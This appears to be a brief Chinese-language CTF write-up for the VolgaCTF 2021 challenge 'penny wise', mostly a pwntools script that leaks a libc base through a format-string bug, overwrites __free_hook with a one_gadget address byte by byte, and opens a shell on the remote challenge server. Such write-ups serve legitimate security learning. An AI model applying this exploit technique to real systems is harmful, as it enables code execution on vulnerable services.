2021VolgaCTF

penny wise

心态非常崩的一道题,发现别人是没有用格式化字符串做的,可是我只看到了格式化字符串。

而且patchelf给出的偏移在这道题有错……

我真的非常不理解,我需要看一看patchelf的原理和具体实现。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
#!/usr/bin/python

from pwn import *
context.log_level=logging.DEBUG
context.terminal=['tmux','new-window']
context.arch='amd64'
LOCAL=0

libc_path='/home/ainevsia/gh/glibc-all-in-one/libs/2.27-3ubuntu1.3_amd64/libc.so.6'

if LOCAL:
p=process(['./bin'],env={'LD_PRELOAD':libc_path})
else:
p=remote('139.162.160.184',19999)

def store(title,content):
p.sendlineafter('[Q]uit\n','S')
p.sendlineafter('title\n',title)
p.sendlineafter('content\n',content)

def ret(title):
p.sendlineafter('[Q]uit\n','R')
p.sendlineafter('title\n',title)

def delete(title):
p.sendlineafter('[Q]uit\n','D')
p.sendlineafter('title\n',title)


title='AAAAAAAA'
# store(title,f'%{(5+0x27+1)}$016llx-'.ljust(9))
store(title,f'%016llx-%{(5+0x27+1)}$016llx-')
# attach(p,'b *$rebase(0xD95)\nc')
ret(title)

p.recvuntil('-')
base=int(p.recvuntil('-').rstrip(b'-'),0x10)-(0x7fea2b0acbf7-0x7fea2b08b000)
p.success('base: '+hex(base))

# libc=ELF(libc_path)
# free_hook=base+libc.symbols['__free_hook']
free_hook=base+(0x7f5dacc498e8-0x7f5dac85c000)
p.success('free_hook: '+hex(free_hook))
onegadget=base+0x4f432 # 0x4f3d5 0x4f432 0x10a41c
# attach(p)
# attach(p)
# pause()
# exit(1)
for i in range(6):
title=b'A'+(free_hook+i).to_bytes(8,byteorder='little')[:-2]
store(title,f'%{(onegadget>>(i*8))&0xff}c%14$hhn'.ljust(0x9))
ret(title)

# attach(p)

title='AAAAAAAA'
delete(title)
p.interactive()